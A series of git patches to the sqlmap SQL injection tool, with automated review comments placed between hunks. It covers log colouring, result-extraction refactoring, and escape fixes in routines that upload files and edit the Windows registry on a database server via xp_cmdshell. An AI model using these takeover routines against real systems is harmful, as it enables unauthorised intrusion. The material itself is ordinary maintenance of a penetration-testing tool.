--- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -164,7 +164,7 @@ def colorize(self, message, levelno): time = match.group(1) if not message.endswith(self.reset): reset = self.reset - elif message.startswith(self.bold): # bold + elif self.bold in message: # bold reset = self.reset + self.bold else: reset = self.reset @@ -175,11 +175,22 @@ def colorize(self, message, levelno): counter = match.group(1) if not message.endswith(self.reset): reset = self.reset - elif message.startswith(self.bold): # bold + elif self.bold in message: # bold reset = self.reset + self.bold else: reset = self.reset message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) + + match = re.search(r"'([^']+)'", message) # single-quoted + if match: + string = match.group(1) + if not message.endswith(self.reset): + reset = self.reset + elif self.bold in message: # bold + reset = self.reset + self.bold + else: + reset = self.reset + message = message.replace(string, ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, reset)), 1) else: message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c936dc4bb88..58aa0ba794c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4c4a8178e4fd6e1fa8225c8c08815cd0 lib/core/settings.py +dca7833ecd9019b230cb281eddb83c34 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py 
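Review bot: In the new single-quoted block of `colorize`, `message.replace(string, ..., 1)` replaces the first occurrence of the quoted text anywhere in the message, which is not necessarily the quoted one (a message mentioning `foo` before `'foo'` gets the wrong span colored), and because `string` is arbitrary log content an occurrence inside an already-inserted CSI sequence could be re-wrapped; slicing on the match instead, `message = message[:match.start(1)] + ''.join((...)) + message[match.end(1):]`, anchors the edit to the matched span. The `endswith(self.reset)` / `self.bold in message` ladder that computes `reset` is now copied verbatim for the time, counter and quoted-string cases (the first hunk touches one copy too); a small helper such as `def _reset(self, message):` returning the chosen sequence would remove the duplication. `colorize` begins and ends outside the hunk.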
@@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -641fc9d8f1f8ccb4488f717668422c21 thirdparty/ansistrm/ansistrm.py +b307cd108a5f0d365bfab935d867123c thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 5f1bae86b0a299e831c7fefcc3735024922aab43 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 19 Jul 2018 18:00:56 +0200 Subject: [PATCH 212/428] Fixes #3194 --- lib/core/common.py | 2 -- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 3 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 48af95c4f75..10a9b0ebb08 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1317,8 +1317,6 @@ def parseTargetDirect(): if not conf.direct: return - conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters - details = None remote = False diff --git a/lib/core/settings.py b/lib/core/settings.py index dcad0b64c87..09aadcf6033 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.19" +VERSION = "1.2.7.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 58aa0ba794c..5fcb4db9055 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -b703bb5160945067a36c6827c34e1624 lib/core/common.py +2131176e2fca7d400ccd0e2da6f8b77b lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dca7833ecd9019b230cb281eddb83c34 lib/core/settings.py +59ebdd0d032d8110419c4e4b84c869b6 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py From 22c7bc54b453d82b0911d543bc7725ae82ecac83 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 27 Jul 2018 00:01:23 +0200 Subject: [PATCH 213/428] Minor patch --- lib/core/settings.py | 2 +- thirdparty/ansistrm/ansistrm.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 09aadcf6033..2411df56f6e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.20" +VERSION = "1.2.7.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/ansistrm/ansistrm.py b/thirdparty/ansistrm/ansistrm.py index e641d43cc2d..346e0d3cb3d 100644 
--- a/thirdparty/ansistrm/ansistrm.py +++ b/thirdparty/ansistrm/ansistrm.py @@ -182,7 +182,7 @@ def colorize(self, message, levelno): message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, reset)), 1) match = re.search(r"'([^']+)'", message) # single-quoted - if match: + if level != "PAYLOAD" and match: string = match.group(1) if not message.endswith(self.reset): reset = self.reset diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 5fcb4db9055..eb7ad959495 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -59ebdd0d032d8110419c4e4b84c869b6 lib/core/settings.py +475b8df4fbbb3b5108ccb1e856fe2a61 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -285,7 +285,7 @@ fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py 929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py 3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -b307cd108a5f0d365bfab935d867123c thirdparty/ansistrm/ansistrm.py +b25b47ddeeb62e5857fd5ad17fd454b5 thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py From 1e60378fb2d9d4e5a10b092db62db2743b9268a9 Mon Sep 17 00:00:00 2001 
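Review bot: `level` in the new condition `if level != "PAYLOAD" and match:` is bound by the earlier `# log level` match outside this hunk; if that binding only happens inside its `if match:` branch, a message without a `[LEVEL]` tag raises `NameError` here instead of merely skipping the coloring. Initialising it before the first regex, `level = None`, keeps the new branch safe for untagged messages. Excluding `PAYLOAD` lines from quote coloring is a sound choice, since payload text is data being logged rather than a message and should not be rewritten on output; a one-line comment, `# payload lines are printed verbatim`, would record that intent next to the guard.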
From: Miroslav Stampar Date: Fri, 27 Jul 2018 00:30:30 +0200 Subject: [PATCH 214/428] Minor refactoring --- lib/core/common.py | 14 ++++++++------ lib/core/settings.py | 2 +- lib/takeover/xp_cmdshell.py | 2 +- plugins/dbms/mssqlserver/filesystem.py | 22 +++++++++++----------- plugins/generic/takeover.py | 8 ++++---- txt/checksum.md5 | 10 +++++----- 6 files changed, 30 insertions(+), 28 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 10a9b0ebb08..db48c0b2808 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1297,7 +1297,7 @@ def setPaths(rootPath): paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml") for path in paths.values(): - if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")): + if any(path.endswith(_) for _ in (".md5", ".txt", ".xml", ".zip")): checkFile(path) def weAreFrozen(): @@ -1427,7 +1427,7 @@ def parseTargetUrl(): errMsg += "on this platform" raise SqlmapGenericException(errMsg) - if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I): + if not re.search(r"^https?://", conf.url, re.I) and not re.search(r"^wss?://", conf.url, re.I): if re.search(r":443\b", conf.url): conf.url = "https://%s" % conf.url else: @@ -1528,14 +1528,14 @@ def expandAsteriskForColumns(expression): the SQL query string (expression) """ - asterisk = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression) + match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression) - if asterisk: + if match: infoMsg = "you did not provide the fields in your query. " infoMsg += "sqlmap will retrieve the column names itself" logger.info(infoMsg) - _ = asterisk.group(2).replace("..", '.').replace(".dbo.", '.') + _ = match.group(2).replace("..", '.').replace(".dbo.", '.') db, conf.tbl = _.split('.', 1) if '.' in _ else (None, _) if db is None: 
@@ -4284,9 +4284,11 @@ def extractExpectedValue(value, expected): value = value.strip().lower() if value in ("true", "false"): value = value == "true" + elif value in ('t', 'f'): + value = value == 't' elif value in ("1", "-1"): value = True - elif value == "0": + elif value == '0': value = False else: value = None diff --git a/lib/core/settings.py b/lib/core/settings.py index 2411df56f6e..e62570a4f63 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.7.21" +VERSION = "1.2.7.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py index 19b06d8e80f..e2f92441d3f 100644 --- a/lib/takeover/xp_cmdshell.py +++ b/lib/takeover/xp_cmdshell.py @@ -136,7 +136,7 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile): for line in lines: echoedLine = "echo %s " % line - echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile) + echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile) echoedLines.append(echoedLine) for echoedLine in echoedLines: diff --git a/plugins/dbms/mssqlserver/filesystem.py b/plugins/dbms/mssqlserver/filesystem.py index c94f70f4fd1..6da84d561d1 100644 --- a/plugins/dbms/mssqlserver/filesystem.py +++ b/plugins/dbms/mssqlserver/filesystem.py 
@@ -67,11 +67,11 @@ def _updateDestChunk(self, fileContent, tmpPath): chunkName = randomStr(lowercase=True) fileScrLines = self._dataToScr(fileContent, chunkName) - logger.debug("uploading debug script to %s\%s, please wait.." % (tmpPath, randScr)) + logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr)) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) - logger.debug("generating chunk file %s\%s from debug script %s" % (tmpPath, chunkName, randScr)) + logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr)) commands = ( "cd \"%s\"" % tmpPath, @@ -174,10 +174,10 @@ def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): encodedFileContent = base64encode(wFileContent) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) - encodedBase64FilePath = "%s\%s" % (tmpPath, encodedBase64File) + encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) - randPSScriptPath = "%s\%s" % (tmpPath, randPSScript) + randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) wFileSize = len(encodedFileContent) chunkMaxSize = 1024 @@ -212,15 +212,15 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp logger.info(infoMsg) dFileName = ntpath.basename(dFile) - sFile = "%s\%s" % (tmpPath, dFileName) + sFile = "%s\\%s" % (tmpPath, dFileName) wFileSize = os.path.getsize(wFile) debugSize = 0xFF00 if wFileSize < debugSize: chunkName = self._updateDestChunk(wFileContent, tmpPath) - debugMsg = "renaming chunk file %s\%s to %s " % (tmpPath, chunkName, fileType) - debugMsg += "file %s\%s and moving it to %s" % (tmpPath, dFileName, dFile) + debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) + debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile) logger.debug(debugMsg) commands = ( 
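Review bot: The `"%s\\%s" % (tmpPath, ...)` rewrites in `_updateDestChunk`, `_stackedWriteFilePS` and `_stackedWriteFileDebugExe` (and the same pattern in the `xpCmdshellWriteFile` hunk on the preceding line and the `_stackedWriteFileVbs`/`_stackedWriteFileCertutilExe` hunks that follow) only correct the escape sequence; the runtime strings are unchanged, because Python keeps an unrecognised `\%` literally. Since this file already uses `ntpath` (`ntpath.basename(dFile)` is visible in `_stackedWriteFileDebugExe`), the remote path values could be built with it instead of manual backslash formatting, e.g. `sFile = ntpath.join(tmpPath, dFileName)`, which also copes with a `tmpPath` that already ends in a separator; the log messages can keep their `%s\\%s` wording. All of these methods start outside their hunks.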
@@ -248,7 +248,7 @@ def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileTyp debugMsg = "appending chunk " copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) - debugMsg += "%s\%s to %s file %s\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) + debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) logger.debug(debugMsg) commands = ( @@ -275,7 +275,7 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) + randFilePath = "%s\\%s" % (tmpPath, randFile) vbs = """Dim inputFilePath, outputFilePath inputFilePath = "%s" @@ -338,7 +338,7 @@ def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) - logger.debug("uploading a visual basic decoder stub %s\%s, please wait.." % (tmpPath, randVbs)) + logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) @@ -359,7 +359,7 @@ def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, file chunkMaxSize = 500 randFile = "tmpf%s.txt" % randomStr(lowercase=True) - randFilePath = "%s\%s" % (tmpPath, randFile) + randFilePath = "%s\\%s" % (tmpPath, randFile) encodedFileContent = base64encode(wFileContent) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index f65928a13be..e53eeedd1d9 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -372,7 +372,7 @@ def regRead(self): else: regVal = conf.regVal - infoMsg = "reading Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "reading Windows registry path '%s\\%s' " % (regKey, regVal) logger.info(infoMsg) return self.readRegKey(regKey, regVal, True) 
@@ -417,7 +417,7 @@ def regAdd(self): else: regType = conf.regType - infoMsg = "adding Windows registry path '%s\%s' " % (regKey, regVal) + infoMsg = "adding Windows registry path '%s\\%s' " % (regKey, regVal) infoMsg += "with data '%s'. " % regData infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." @@ -449,12 +449,12 @@ def regDel(self): regVal = conf.regVal message = "are you sure that you want to delete the Windows " - message += "registry path '%s\%s? [y/N] " % (regKey, regVal) + message += "registry path '%s\\%s? [y/N] " % (regKey, regVal) if not readInput(message, default='N', boolean=True): return - infoMsg = "deleting Windows registry path '%s\%s'. " % (regKey, regVal) + infoMsg = "deleting Windows registry path '%s\\%s'. " % (regKey, regVal) infoMsg += "This will work only if the user running the database " infoMsg += "process has privileges to modify the Windows registry." logger.info(infoMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index eb7ad959495..04509aaa51c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -2131176e2fca7d400ccd0e2da6f8b77b lib/core/common.py +de53dd81bda04541d0992852aee0f2b3 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
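Review bot: The confirmation prompt in `regDel` has an unbalanced quote around the registry path: `message += "registry path '%s\\%s? [y/N] " % (regKey, regVal)` opens a `'` that is never closed, unlike the `infoMsg` lines in `regRead`, `regAdd` and the deletion message right below it. Suggest `message += "registry path '%s\\%s'? [y/N] " % (regKey, regVal)` so the prompt reads consistently with the other messages. `regDel` begins outside the hunk.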
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -475b8df4fbbb3b5108ccb1e856fe2a61 lib/core/settings.py +9c991557b5b0a38f14c5667d627ead76 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 12bed9603b6fba3e5ffda11d584bc449 lib/core/target.py @@ -88,7 +88,7 @@ acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py 48575dde7bb867b7937769f569a98309 lib/takeover/udf.py f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py -f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py +debc36a3ff80ba915aeeee69b21a8ddc lib/takeover/xp_cmdshell.py 09beb19c2ec9fdd14329f1c0b59a2d05 lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py @@ -163,7 +163,7 @@ e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py -177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py +65911fdc86fa6322e72319e6488a0bb8 plugins/dbms/mssqlserver/filesystem.py 08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 
@@ -214,7 +214,7 @@ f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py
 f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py
 b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py
 a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py
-e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py
+4adc07051b727f1525cf0a2d619221f8 plugins/generic/takeover.py
 4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py
 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py
 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_
From f63ceaa0c17085ea11521c4d3435ceded20bd34e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Fri, 27 Jul 2018 00:53:14 +0200
Subject: [PATCH 215/428] Minor refactoring
---
 lib/core/common.py | 10 ++++++++++
 lib/core/settings.py | 2 +-
 lib/techniques/error/use.py | 20 ++++++++++----------
 lib/techniques/union/use.py | 6 +++++-
 txt/checksum.md5 | 8 ++++----
 5 files changed, 30 insertions(+), 16 deletions(-)
diff --git a/lib/core/common.py b/lib/core/common.py
index db48c0b2808..920d6563044 100644
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -4702,3 +4702,13 @@ def safeVariableNaming(value):
 def unsafeVariableNaming(value):
 return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value)
+
+def firstNotNone(*args):
+ retVal = None
+
+ for _ in args:
+ if _ is not None:
+ retVal = _
+ break
+
+ return retVal
diff --git a/lib/core/settings.py b/lib/core/settings.py
index e62570a4f63..c5a6196ec69 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.7.22"
+VERSION = "1.2.7.23"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
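Review bot: `firstNotNone` has no docstring, and its loop-with-flag body is the long form of a one-line generator idiom: `return next((_ for _ in args if _ is not None), None)`. Suggested docstring: `"""Returns the first argument that is not None (or None if there is none)"""`. It should also spell out that the semantics differ from an `or` chain — a falsy non-None value such as `""` or `0` is returned rather than skipped — because the `trimmed` call site in lib/techniques/error/use.py in this same commit replaces an `or` chain with it.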
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 6aac89350ef..0674f38d6f7 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -16,6 +16,7 @@ from lib.core.common import dataToStdout from lib.core.common import decodeHexValue from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone from lib.core.common import getConsoleWidth from lib.core.common import getPartRun from lib.core.common import getUnicode @@ -102,7 +103,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): try: while True: check = r"(?si)%s(?P.*?)%s" % (kb.chars.start, kb.chars.stop) - trimcheck = r"(?si)%s(?P[^<\n]*)" % kb.chars.start + trimCheck = r"(?si)%s(?P[^<\n]*)" % kb.chars.start if field: nulledCastedField = agent.nullAndCastField(field) 
@@ -133,22 +134,21 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
 # Parse the returned page to get the exact error-based
 # SQL injection output
- output = reduce(lambda x, y: x if x is not None else y, (
+ output = firstNotNone(
 extractRegexResult(check, page),
 extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
 extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
- extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)),
- None
+ extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
 )
 if output is not None:
 output = getUnicode(output)
 else:
- trimmed = (
- extractRegexResult(trimcheck, page) or
- extractRegexResult(trimcheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None) or
- extractRegexResult(trimcheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)) or
- extractRegexResult(trimcheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
+ trimmed = firstNotNone(
+ extractRegexResult(trimCheck, page),
+ extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
+ extractRegexResult(trimCheck, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
+ extractRegexResult(trimCheck, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
 )
 if trimmed:
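Review bot: Replacing the `or` chain with `firstNotNone` changes which candidate wins for `trimmed`: the old chain skipped falsy results, so an empty match from `page` fell through to the HTTP error body, the headers or the redirect message, whereas `firstNotNone` stops at the first value that is not None, including `""`. The `trimCheck` pattern from the previous hunk captures with a `*` quantifier, so an empty capture is possible whenever `kb.chars.start` is present with nothing usable after it, and — assuming extractRegexResult hands back the captured group as-is — the `if trimmed:` guard would then reject it instead of consulting the remaining sources. If that fallthrough is still wanted, keep `or` for `trimmed` (the `output` branch already compared against None, so it is unaffected); otherwise a comment such as `# NOTE: an empty match is terminal here, later sources are not consulted` would stop the next reader from re-"fixing" it. `_oneShotErrorUse` begins and ends outside the hunk.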
@@ -163,7 +163,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False): output = extractRegexResult(check, trimmed, re.IGNORECASE) if not output: - check = "(?P[^\s<>'\"]+)" + check = r"(?P[^\s<>'\"]+)" output = extractRegexResult(check, trimmed, re.IGNORECASE) else: output = output.rstrip() diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index 30c986d4b41..1e65f67dcfb 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -19,6 +19,7 @@ from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import extractRegexResult +from lib.core.common import firstNotNone from lib.core.common import flattenValue from lib.core.common import getConsoleWidth from lib.core.common import getPartRun @@ -90,7 +91,10 @@ def _oneShotUnionUse(expression, unpack=True, limited=False): # Parse the returned page to get the exact UNION-based # SQL injection output def _(regex): - return reduce(lambda x, y: x if x is not None else y, (extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), None) + return firstNotNone( + extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), + extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE) + ) # Automatically patching last char trimming cases if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 04509aaa51c..3fc726e5da6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
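Review bot: The helper in the union hunk is named `_` and its own body reuses `_` as the generator variable in `(_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI))`; the generator has its own scope so this works, but a reader has to stop and verify that. Renaming the loop variable, e.g. `(header for header in headers.headers if not header.startswith(HTTP_HEADER.URI))`, or giving the helper a descriptive name would help. The header filter is also inconsistent with the error-based path changed in lib/techniques/error/use.py in this same commit, which compares `header.lower() != HTTP_HEADER.URI.lower()` case-insensitively while this one uses a case-sensitive `startswith`; it is unclear whether that difference is intended. `_oneShotUnionUse` starts outside the hunk.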
